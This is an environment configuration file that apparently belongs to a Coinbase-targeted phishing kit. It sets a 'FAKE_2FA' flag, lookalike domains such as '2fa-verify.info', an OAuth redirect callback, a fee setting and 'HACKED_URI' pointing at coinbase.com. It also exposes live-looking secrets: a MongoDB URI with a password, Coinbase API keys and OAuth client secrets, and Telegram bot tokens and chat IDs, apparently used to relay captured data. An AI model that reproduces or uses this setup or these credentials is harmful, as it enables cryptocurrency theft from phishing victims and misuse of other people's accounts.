# MONGOURI=mongodb+srv://celebration:pVrYv1GcbvPXxIMX@heycool.ilrzsxg.mongodb.net/orca?retryWrites=true&w=majority
MONGOURI=mongodb://65.108.239.102:27017/cbdb
# FRONTEND_URI=https://2fa-verify.info
FRONTEND_URI=https://assets-support.com

FEE=3
FAKE_2FA=0

# Coinbase API KEY
# API_KEY=SYWBz0H7LQKpv7C6
# API_SECRET=uZyfUvzzjA8Pi58YMJe3qqRXQG5HeyQ3

# CLIENT_ID=ebec931357b16336524b5c018b4416f30089d54427df6cfbee7e9c75e75f0f69
# CLIENT_SECRET=5d00e2ae99cf6df76f44ffd5c2445724d0d392a24161f758336078a06422e395

CLIENT_ID=a66d6ad53d555dfa49ddc1dfde06ae4fc9af95c37c1d78e88570befc3cca568c
CLIENT_SECRET=ad6dcbdceb4a6a0dca471e17fa2d2ad09ef3592d60e03ae13604a59b8eaa49fb

# REDIRECT_URI=https://app-accountactivity.info/api-cb/callback
REDIRECT_URI=https://test-qlly.onrender.com/api-cb/callback
CB_VERSION=2024-05-17

# TELEGRAM
# BOT_TOKEN=6951526727:AAEQVy4hIXkUJUCCRE1qz-h_X2f_QBMVF28
BOT_TOKEN=7306131287:AAF59oUYaHCcKlsZc9f83IFus1cQqEnAOOs
# CHAT_ID=-4216025681
CHAT_ID=-4228812604

# UPDATE INFO
HACKED_URI=https://www.coinbase.com
